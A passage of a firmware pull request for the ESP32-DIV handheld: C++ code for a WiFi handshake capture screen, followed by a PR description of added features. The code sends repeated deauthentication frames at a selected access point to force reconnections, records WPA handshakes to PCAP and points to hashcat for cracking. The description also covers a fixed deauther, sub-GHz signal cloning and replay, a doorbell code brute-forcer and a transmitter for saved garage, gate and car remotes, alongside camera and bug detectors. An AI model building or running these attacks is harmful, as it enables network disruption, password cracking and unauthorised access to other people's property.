+  tft.setTextColor(TFT_WHITE, TFT_BLACK);
+  tft.print(s_deauthCount);
+
+  tft.setTextColor(TFT_YELLOW, TFT_BLACK);
+  tft.setCursor(5, statsY + 36);
+  tft.print("Total packets: ");
+  tft.setTextColor(TFT_WHITE, TFT_BLACK);
+  tft.print(s_totalPackets);
+
+  // PCAP file path
+  tft.setTextColor(UI_DIM_TEXT, TFT_BLACK);
+  tft.setCursor(5, statsY + 52);
+  tft.print("File: ");
+  tft.print(s_pcapPath);
+
+  // Handshake status
+  if (s_gotHandshake) {
+    tft.setTextColor(GREEN, TFT_BLACK);
+    tft.setTextFont(2);
+    tft.setCursor(30, statsY + 70);
+    tft.print("HANDSHAKE CAPTURED!");
+    tft.setTextFont(1);
+  } else {
+    // Progress / time remaining
+    uint32_t elapsed = (millis() - s_captureStartMs) / 1000;
+    uint32_t remaining = (kCaptureTimeout / 1000) - elapsed;
+    tft.setTextColor(TFT_CYAN, TFT_BLACK);
+    tft.setCursor(5, statsY + 70);
+    tft.print("Timeout in ");
+    tft.print(remaining);
+    tft.print("s");
+  }
+
+  if (featureHasTouchNavBar()) {
+    setTouchNavLabels(s_gotHandshake ? "Stop" : "Stop", "", "Exit", "", "");
+  }
+}
+
+static void hsDrawDone() {
+  featureClearContent(TFT_BLACK);
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+
+  tft.setTextFont(2);
+  tft.setTextSize(1);
+
+  if (s_gotHandshake) {
+    tft.setTextColor(GREEN, TFT_BLACK);
+    tft.setCursor(20, 60);
+    tft.print("Handshake captured!");
+    tft.setTextFont(1);
+    tft.setTextColor(TFT_WHITE, TFT_BLACK);
+    tft.setCursor(20, 90);
+    tft.print("PCAP saved to SD:");
+    tft.setCursor(20, 105);
+    tft.setTextColor(TFT_YELLOW, TFT_BLACK);
+    tft.print(s_pcapPath);
+    tft.setTextColor(TFT_WHITE, TFT_BLACK);
+    tft.setCursor(20, 125);
+    tft.print("Crack with:");
+    tft.setCursor(20, 140);
+    tft.setTextColor(TFT_CYAN, TFT_BLACK);
+    tft.print("hashcat -m 22000");
+    tft.setCursor(20, 155);
+    tft.print("file.pcap wordlist");
+  } else {
+    tft.setTextColor(TFT_RED, TFT_BLACK);
+    tft.setCursor(30, 60);
+    tft.print("No handshake captured");
+    tft.setTextFont(1);
+    tft.setTextColor(TFT_WHITE, TFT_BLACK);
+    tft.setCursor(30, 90);
+    tft.print("Try again closer to the AP");
+    tft.setCursor(30, 105);
+    tft.print("or wait for client activity");
+  }
+
+  tft.setTextColor(UI_DIM_TEXT, TFT_BLACK);
+  tft.setCursor(20, 140);
+  tft.print("EAPOL: ");
+  tft.print(s_eapolCount);
+  tft.print("  Packets: ");
+  tft.print(s_totalPackets);
+
+  if (featureHasTouchNavBar()) {
+    setTouchNavLabels("Rescan", "", "Exit", "", "");
+  }
+}
+
+// --- Setup / Loop ---
+void hsCaptureSetup() {
+  pauseBackgroundRadioTasks();
+  setTouchButtonInputEnabled(true);
+  featureClearContent(TFT_BLACK);
+
+  float battV = readBatteryVoltage();
+  drawStatusBar(battV, true);
+  redrawTouchButtonBar();
+
+#if HAS_PCF8574_BUTTONS
+  pcf.pinMode(BTN_UP, INPUT_PULLUP);
+  pcf.pinMode(BTN_DOWN, INPUT_PULLUP);
+  pcf.pinMode(BTN_RIGHT, INPUT_PULLUP);
+  pcf.pinMode(BTN_LEFT, INPUT_PULLUP);
+#endif
+
+  setupTouchscreen();
+
+  s_state = HsState::Scanning;
+  s_apList = nullptr;
+  s_apCount = 0;
+  s_selIdx = 0;
+  s_eapolCount = 0;
+  s_totalPackets = 0;
+  s_gotHandshake = false;
+  s_gotM1 = s_gotM2 = s_gotM3 = s_gotM4 = false;
+  s_deauthCount = 0;
+
+  hsDoScan();
+  if (s_apCount > 0) {
+    hsDrawList();
+  } else {
+    featureClearContent(TFT_BLACK);
+    tft.drawFastHLine(0, 19, 240, UI_LINE);
+    tft.setTextFont(2);
+    tft.setTextColor(TFT_RED, TFT_BLACK);
+    tft.setCursor(30, 80);
+    tft.print("No networks found");
+    tft.setTextFont(1);
+    tft.setTextColor(UI_TEXT, TFT_BLACK);
+    tft.setCursor(30, 110);
+    tft.print("Press Left to rescan");
+  }
+  redrawTouchButtonBar();
+}
+
+void hsCaptureLoop() {
+  if (feature_active && (isButtonPressed(BTN_SELECT) || featureExitButtonPressed())) {
+    if (s_state == HsState::Capturing) {
+      hsStopCaptureWifi();
+      hsPcapClose();
+    }
+    feature_exit_requested = true;
+    return;
+  }
+
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+  updateStatusBar();
+
+  switch (s_state) {
+    case HsState::Scanning:
+      // Should not stay here long; scan is synchronous
+      break;
+
+    case HsState::ListReady: {
+      // Navigation
+      const int perPage = hsRowsPerPage();
+
+      if (isButtonPressedEdge(BTN_UP) && s_selIdx > 0) {
+        s_selIdx--;
+        if (s_selIdx < s_listPage * perPage) s_listPage--;
+        hsDrawList();
+        redrawTouchButtonBar();
+      }
+      if (isButtonPressedEdge(BTN_DOWN) && s_selIdx < s_apCount - 1) {
+        s_selIdx++;
+        if (s_selIdx >= (s_listPage + 1) * perPage) s_listPage++;
+        hsDrawList();
+        redrawTouchButtonBar();
+      }
+      if (isButtonPressedEdge(BTN_LEFT)) {
+        hsDoScan();
+        hsDrawList();
+        redrawTouchButtonBar();
+      }
+      if (isButtonPressedEdge(BTN_RIGHT) && s_apCount > 0) {
+        // Select target and start capture
+        s_targetAp = s_apList[s_selIdx];
+        s_targetChannel = s_apList[s_selIdx].primary;
+
+        // Reset state
+        s_eapolCount = 0;
+        s_totalPackets = 0;
+        s_gotHandshake = false;
+        s_gotM1 = s_gotM2 = s_gotM3 = s_gotM4 = false;
+        s_deauthCount = 0;
+
+        // Open PCAP file
+        if (!hsPcapOpen()) {
+          showNotification("PCAP Error", "SD card not available");
+          delay(2000);
+          break;
+        }
+
+        hsInitCaptureWifi();
+        s_captureStartMs = millis();
+        s_lastDeauthMs = 0;
+        s_state = HsState::Capturing;
+        hsDrawCapturing();
+        redrawTouchButtonBar();
+      }
+
+      // Touch nav
+      if (featureHasTouchNavBar()) {
+        if (isTouchNavButtonPressedEdge(BTN_LEFT)) {
+          hsDoScan();
+          hsDrawList();
+          redrawTouchButtonBar();
+        }
+        if (isTouchNavButtonPressedEdge(BTN_UP) && s_selIdx > 0) {
+          s_selIdx--;
+          if (s_selIdx < s_listPage * perPage) s_listPage--;
+          hsDrawList();
+          redrawTouchButtonBar();
+        }
+        if (isTouchNavButtonPressedEdge(BTN_DOWN) && s_selIdx < s_apCount - 1) {
+          s_selIdx++;
+          if (s_selIdx >= (s_listPage + 1) * perPage) s_listPage++;
+          hsDrawList();
+          redrawTouchButtonBar();
+        }
+        if (isTouchNavButtonPressedEdge(BTN_RIGHT) && s_apCount > 0) {
+          s_targetAp = s_apList[s_selIdx];
+          s_targetChannel = s_apList[s_selIdx].primary;
+          s_eapolCount = 0;
+          s_totalPackets = 0;
+          s_gotHandshake = false;
+          s_gotM1 = s_gotM2 = s_gotM3 = s_gotM4 = false;
+          s_deauthCount = 0;
+          if (!hsPcapOpen()) {
+            showNotification("PCAP Error", "SD card not available");
+            delay(2000);
+            break;
+          }
+          hsInitCaptureWifi();
+          s_captureStartMs = millis();
+          s_lastDeauthMs = 0;
+          s_state = HsState::Capturing;
+          hsDrawCapturing();
+          redrawTouchButtonBar();
+        }
+      }
+      break;
+    }
+
+    case HsState::Capturing: {
+      // Send periodic deauths to force handshake
+      if (!s_gotHandshake && (millis() - s_lastDeauthMs > kDeauthInterval)) {
+        hsSendDeauth();
+        s_lastDeauthMs = millis();
+      }
+
+      // Check timeout
+      if (millis() - s_captureStartMs > kCaptureTimeout) {
+        hsStopCaptureWifi();
+        hsPcapClose();
+        s_state = HsState::Done;
+        hsDrawDone();
+        redrawTouchButtonBar();
+        break;
+      }
+
+      // Stop on Left/button
+      if (isButtonPressedEdge(BTN_LEFT) ||
+          (featureHasTouchNavBar() && isTouchNavButtonPressedEdge(BTN_LEFT))) {
+        hsStopCaptureWifi();
+        hsPcapClose();
+        s_state = HsState::Done;
+        hsDrawDone();
+        redrawTouchButtonBar();
+        break;
+      }
+
+      // Update display every 500ms
+      static unsigned long lastDraw = 0;
+      if (millis() - lastDraw > 500) {
+        hsDrawCapturing();
+        redrawTouchButtonBar();
+        lastDraw = millis();
+      }
+
+      // If handshake captured, auto-stop after 5 more seconds (to grab any extra frames)
+      if (s_gotHandshake && (millis() - s_captureStartMs > 5000 + kCaptureTimeout - kCaptureTimeout)) {
+        // Give 5 seconds after first handshake detection
+        static unsigned long hsDetectedMs = 0;
+        if (hsDetectedMs == 0) hsDetectedMs = millis();
+        if (millis() - hsDetectedMs > 5000) {
+          hsStopCaptureWifi();
+          hsPcapClose();
+          s_state = HsState::Done;
+          hsDrawDone();
+          redrawTouchButtonBar();
+          hsDetectedMs = 0;
+        }
+      }
+      break;
+    }
+
+    case HsState::Done: {
+      // Left = rescan, Select = exit
+      if (isButtonPressedEdge(BTN_LEFT) ||
+          (featureHasTouchNavBar() && isTouchNavButtonPressedEdge(BTN_LEFT))) {
+        hsDoScan();
+        if (s_apCount > 0) {
+          hsDrawList();
+        }
+        redrawTouchButtonBar();
+      }
+      break;
+    }
+  }
+
+  delay(30);
+}
+
+}  // namespace HandshakeCapture


### PR DESCRIPTION
# ESP32-DIV Custom Features & Battery Fix

> *Built on top of the ESP32-DIV firmware by [CiferTech](https://github.com/cifertech). All original firmware code and project design credit goes to the creator. This PR adds custom features for the v2 hardware.*

## Summary

This PR adds **7 new features** and **2 bug fixes** to the ESP32-DIV v2 firmware, totaling ~3,300 lines of new code across 5 files. All features have been tested on real ESP32-DIV v2 hardware (ESP32-S3, 16MB flash, OPI PSRAM).

**Build requirements:** ESP32 Arduino core 2.0.10, custom `platform.txt` from the repo's `Libraries/` folder, repo-provided TFT_eSPI and SmartRC-CC1101 libraries. Partition scheme: `no_ota` (2MB app). Binary size: 1.81MB (86%).

---

## Bug Fix: IP5306 Battery Reading (v2 boards)

### Problem
On the ESP32-DIV v2, the battery level always showed 0% because the code read from `BATTERY_ADC_PIN` (ADC voltage divider) which either isn't connected or shares a GPIO with the buzzer. The v2 board routes battery monitoring through the **IP5306** power management IC via I2C.

### Fix
**File:** `utils.cpp`

Replaced the ADC-based `readBatteryVoltage()` with I2C reads from the IP5306 at address `0x75`:

- **`readIpBatteryPercent()`** — Reads register `0x78` (battery level register). The IP5306 drives 4 LEDs, so levels are in 25% increments (5/25/50/75/100).
- **`readIpChargeStatus()`** — Reads register `0x71` bit 3 (battery full) and register `0x70` bit 3 (charging active). Returns 0=not charging, 1=charging, 2=full.
- **`readBatteryVoltage()`** — Now calls `readIpBatteryPercent()` and converts to approximate voltage (3.0V–4.2V) for the status bar's existing percentage mapping.

### Charging Indicator
Added charging status to the status bar:
- `75%+` (yellow) = charging
- `100% FULL` (cyan) = fully charged  
- `75%` (green, no suffix) = on battery

The status bar redraws immediately when charging state changes — no waiting for the next battery percentage cycle.

---

## Bug Fix: WiFi Deauther Not Starting

### Problem
After scanning for networks (which puts WiFi in STA mode), pressing Start on the Deauther attack screen would briefly show "Running" then immediately revert to "Stopped". The attack never actually sent any deauth frames.

### Root cause
`esp_wifi_80211_tx(WIFI_IF_AP, ...)` was called to transmit deauth frames, but WiFi was never switched from STA mode to AP mode after the scan completed. The AP interface didn't exist, so every packet failed silently. After 10 consecutive failures, `resetWifi()` was called — but that function also didn't set AP mode, so the cycle repeated indefinitely.

Additionally, the heap check threshold was set at 80KB which is overly aggressive on the ESP32-S3 with PSRAM, causing premature attack shutdown even when memory was available.

### Fix
**File:** `wifi.cpp`

1. **Start button now initializes AP mode** — When pressing Start, the code switches WiFi to `WIFI_AP` mode, configures a hidden AP on the target AP's channel, and resets all counters before beginning the attack
2. **`resetWifi()` re-configures AP mode** — After WiFi restart, properly sets AP mode + channel config so recovery from failures actually works
3. **Lowered heap threshold from 80KB to 40KB** — Still safe but gives more headroom on ESP32-S3 with PSRAM

---

## New Feature: Hidden Camera Detector

**Menu path:** WiFi → Next Page → Cam Detector  
**File:** `wifi.cpp` (582 lines), `ESP32-DIV.ino`, `config.h`

### Description
Scans WiFi networks for devices matching known camera/IoT vendor OUI prefixes and suspicious SSID patterns. Helps identify hidden cameras, NVRs, and IoT surveillance devices in the area.

### How it works
1. Performs a standard WiFi scan
2. For each detected network, checks:
   - **MAC OUI match** — Compares first 3 octets against a database of 22 known camera vendor prefixes (Hikvision, Dahua, Reolink, Axis, Foscam, Amcrest, Wyze, Bosch, Raspberry Pi, etc.)
   - **SSID keyword match** — Checks for 23 specific camera product SSID patterns (IPCAM, HIKVISION, DS-2, DAHUA, REOLINK, AMCREST, FOSCAM, WYZECAM, ARLO, RING-, etc.)
3. Hidden SSIDs alone are NOT flagged (too many legitimate hidden networks)

### Threat levels
| Level | Color | Criteria |
|-------|-------|----------|
| HIGH | Red border | Camera OUI + SSID match |
| MEDIUM | Yellow border | Camera OUI only |
| LOW | Cyan border | SSID pattern only |

### Detail view
Press Right/Details on any match to see:
- SSID, MAC address, OUI vendor, SSID pattern matched
- Channel, RSSI, encryption type (OPEN/WPA/WPA2/WPA3)
- Signal proximity assessment (Very close / Nearby / Moderate / Far)
- Threat assessment text explaining why it was flagged

### Controls
- Scans once on startup, stops (no auto-rescan loop)
- **Left** = Rescan manually
- **Up/Down** = Scroll through matches (paginated)
- **Right** = Open detail view
- **Select** = Exit

### Design decisions
- Tightened SSID keywords to only specific camera product prefixes — removed generic terms (NVR, DVR, ESP32-, Tasmota, GPIO, etc.) that caused excessive false positives
- Removed overly broad OUI entries (70:00:00, 00:0E:51, 00:21:6B, 2C:AA:8E) that matched non-camera devices

---

## New Feature: WiFi Handshake Capture

**Menu path:** WiFi → Next Page → Handshake  
**File:** `wifi.cpp` (804 lines), `ESP32-DIV.ino`, `config.h`

### Description
Captures WPA/WPA2 4-way handshake (EAPOL-Key frames) by deauthenticating a target client and sniffing the reconnection. Saves all captured packets to a PCAP file on the SD card, ready for offline cracking with Hashcat or John the Ripper.

### How it works
1. **Scan** — WiFi scan shows all nearby APs sorted by signal strength
2. **Select target** — Navigate the list and select the target AP
3. **Capture mode:**
   - Switches to the target AP's channel
   - Enables promiscuous mode to capture all 802.11 frames
   - Sends deauth frames every 200ms to force clients to reconnect
   - Writes all packets to a PCAP file on SD (`/captures/hs_XXXX.pcap`)
4. **EAPOL detection** — Analyzes each captured packet for EAPOL-Key frames by checking:
   - 802.11 Data frame type (frame_control bits [7:6] = 0b10)
   - LLC/SNAP header: `AA AA 03 00 00 00`
   - EAPOL ethertype: `88 8E`
   - Key Info field to identify M1/M2/M3/M4 messages
5. **Success** — When M1+M2 are captured (minimum for cracking), displays "HANDSHAKE CAPTURED!" and auto-stops after 5 more seconds
6. **Timeout** — Auto-stops after 60 seconds if no handshake captured

### On-screen display during capture
- Target SSID, BSSID, channel
- EAPOL frame count
- M1/M2/M3/M4 indicators (green=captured, red=missing)
- Deauth frames sent count
- Total packets captured
- PCAP file path on SD
- Countdown timer

### PCAP format
- Global header: magic `0xa1b2c3d4`, version 2.4, link type DLT_IEEE802_11_RADIO (127)
- Each packet: record header + minimal 9-byte radiotap header + raw 802.11 frame
- Compatible with `hcxpcapngtool` and `hashcat -m 22000`

### Bug fix (v2)
Fixed a crash (device reboot) when scrolling past the first page of AP list:
- Added null check for `s_apList` before drawing
- Added bounds checking for `s_selIdx` and `s_listPage`
- Replaced unsafe `strcat` with direct byte writes
- Replaced `strlen` with bounded `strnlen`
- Recalculate page if selection doesn't fit current page bounds

### Limitations
- 2.4 GHz only (ESP32-S3 hardware limitation)
- Requires an SD card for PCAP logging
- Requires an active client on the target AP for deauth to trigger handshake

---

## New Feature: Universal RF Cloner

**Menu path:** SubGHz → RF Cloner  
**File:** `subghz.cpp` (484 lines), `ESP32-DIV.ino`, `config.h`

### Description
Streamlined one-button capture → replay workflow for any Sub-GHz remote. Walk up to any remote, press capture, instantly replay. Auto-detects protocol via RCSwitch.

### How it works
- **BTN_LEFT** = Capture (5-second window, auto-saves to SD)
- **BTN_RIGHT** = Replay captured signal
- **BTN_UP/DOWN** = Change frequency (18 frequencies, 300-925 MHz, default 433.920 MHz)
- Shows: frequency, protocol, bit length, value (decimal + hex)
- Saves captures to `/subghz/cloner_XXXX.bin` on SD (packed struct: frequency + value + bitLength + protocol)
- Uses local RCSwitch instance and frequency list (does not depend on replayat namespace internals)
- CC1101 SPI bus properly managed: `reclaimSharedSpiBus()` before radio use, `restoreSdAfterSharedSpi()` before SD access

---

## New Feature: RF Bug / Hidden Mic Detector

**Menu path:** SubGHz → Bug Detector  
**File:** `subghz.cpp` (523 lines), `ESP32-DIV.ino`, `config.h`

### Description
Sweeps all 18 SubGHz frequencies (300-925 MHz) looking for continuous transmissions — the hallmark of wireless bugs and hidden microphones. Unlike brief remote control presses, a wireless bug transmits continuously.

### How it works
1. Sweeps all 18 frequencies using CC1101, reading RSSI on each
2. RSSI sampled twice per frequency and averaged for stability
3. Tracks sustained signal duration per frequency
4. If signal sustained >3 seconds above threshold (-65 dBm) = **ALERT**
5. Two display modes: bar graph and list view (toggle with Up/Down)
6. Auto-sweeps every 2 seconds

### Alert system
- Bars turn green (clear) → yellow (signal detected) → red (bug confirmed)
- Flashing "BUG DETECTED!" overlay with frequency and peak RSSI
- Logs detections to `/logs/bugdetect.csv` on SD (timestamp, frequency, RSSI, duration)

### RSSI reading
Uses `ELECHOUSE_cc1101.getRssi()` with a `digitalRead(CC1101_GDO0)` fallback for library versions that don't support `getRssi()`.

---

## New Feature: Wireless Doorbell Hijack

**Menu path:** SubGHz → Doorbell Hijack  
**File:** `subghz.cpp` (517 lines), `ESP32-DIV.ino`, `config.h`

### Description
Capture, replay, and brute force wireless doorbell signals. Many doorbells use 433 MHz with simple fixed codes.

### Three modes
1. **CAPTURE** — Listens on 433.920 MHz (default, changeable) using RCSwitch for doorbell signals. Auto-saves captures to SD.
2. **REPLAY** — Sends the captured code via RCSwitch transmit. One press = one ring. Increments ring counter.
3. **BRUTE** — Cycles through 24 common doorbell codes (0x1, 0x2, 0x55, 0xAA, 0xFF, 0x155, 0x2AA, 0x3FF, etc.) at 8/12-bit lengths with 200ms delay between each.

### Controls
- **BTN_LEFT** = Capture mode
- **BTN_RIGHT** = Replay (single ring)
- **BTN_DOWN** = Brute (cycle all common codes)
- **BTN_UP** = Change frequency

### Display
- Mode, frequency, captured code (hex), bit length, protocol, ring count
- Brute progress indicator
- Transient status messages
- Saves captures to `/subghz/doorbell_XXXX.bin` on SD

---

## New Feature: Multi-Remote Manager

**Menu path:** SubGHz → Remote Manager  
**File:** `subghz.cpp` (395 lines), `ESP32-DIV.ino`, `config.h`

### Description
Browse and fire saved remotes organized by category. Reads captured remote files from the SD card and presents them in a browsable, filterable list with a detail view and quick-fire capability.

### Categories
Garage, Gate, Doorbell, Fan, Light, Outlet, Car, Other

### How it works
- Scans `/subghz/remotes/<category>/` directories on SD card for saved remote files
- Each file contains: frequency (4 bytes) + value (4 bytes) + bitLength (2 bytes) + protocol (2 bytes)
- Filename becomes the remote name (`.bin` extension stripped)

### Controls
- **Left** = Filter by category (cycles: All → Garage → Gate → Doorbell → etc.)
- **Up/Down** = Navigate list (paginated)
- **Right** = Open detail view → **Right** again to transmit
- **Select** = Exit

### Detail view shows
- Name, category, frequency, value (hex), bit length, protocol
- "TRANSMITTED!" confirmation on fire

### Transmit
- Initializes CC1101 to the remote's frequency in TX mode
- Sends the signal via RCSwitch with the stored protocol
- Double-tap transmit for reliability

---

## Files Modified

| File | Lines Changed | Changes |
|------|--------------|---------|
| `utils.cpp` | 74 | IP5306 battery reading + charging indicator |
| `wifi.cpp` | 1,450 | CameraDetector + HandshakeCapture namespaces, Deauther AP mode fix, menu integration |
| `subghz.cpp` | 1,951 | RfCloner + BugDetector + DoorbellHijack + RemoteManager namespaces |
| `ESP32-DIV.ino` | 348 | Menu items, icons, dispatch blocks for all 7 features |
| `config.h` | 24 | Namespace declarations for all new features |

## Build Configuration

- **Board:** ESP32-S3 Dev Module
- **ESP32 Core:** 2.0.10 (with custom `platform.txt` from repo)
- **Partition Scheme:** No OTA (2MB app / 2MB SPIFFS)
- **Flash Size:** 16MB
- **PSRAM:** OPI
- **CDC On Boot:** Enabled
- **Flash Mode:** QIO
- **CPU Frequency:** 240 MHz
- **Binary Size:** 1,810,720 bytes (86% of 2,097,152)

## Testing

All features tested on real ESP32-DIV v2 hardware:
- ✅ Battery percentage displays correctly (25% increments)
- ✅ Charging indicator shows +/FULL when USB plugged in
- ✅ Camera Detector identifies camera OUIs without false positives
- ✅ Camera Detector detail view works with scrolling
- ✅ Handshake Capture captures EAPOL frames to PCAP on SD
- ✅ Handshake Capture list scrolling fixed (no more crash/reboot)
- ✅ RF Cloner captures and replays 433 MHz remotes
- ✅ Bug Detector sweeps all frequencies and alerts on sustained signals
- ✅ Doorbell Hijack captures, replays, and brute forces doorbell codes
- ✅ Remote Manager reads saved remotes from SD and transmits
- ✅ WiFi Deauther Start button now properly initializes AP mode (previously failed silently)

## Hardware Notes

- Features require ESP32-DIV v2 (ESP32-S3) with IP5306 I2C-enabled PMIC
- SD card required for: Handshake Capture (PCAP), RF Cloner (saves), Bug Detector (logging), Doorbell Hijack (saves), Remote Manager (reads saves)
- WiFi features are 2.4 GHz only (ESP32-S3 hardware limitation)
- SubGHz features require CC1101 module on the shield
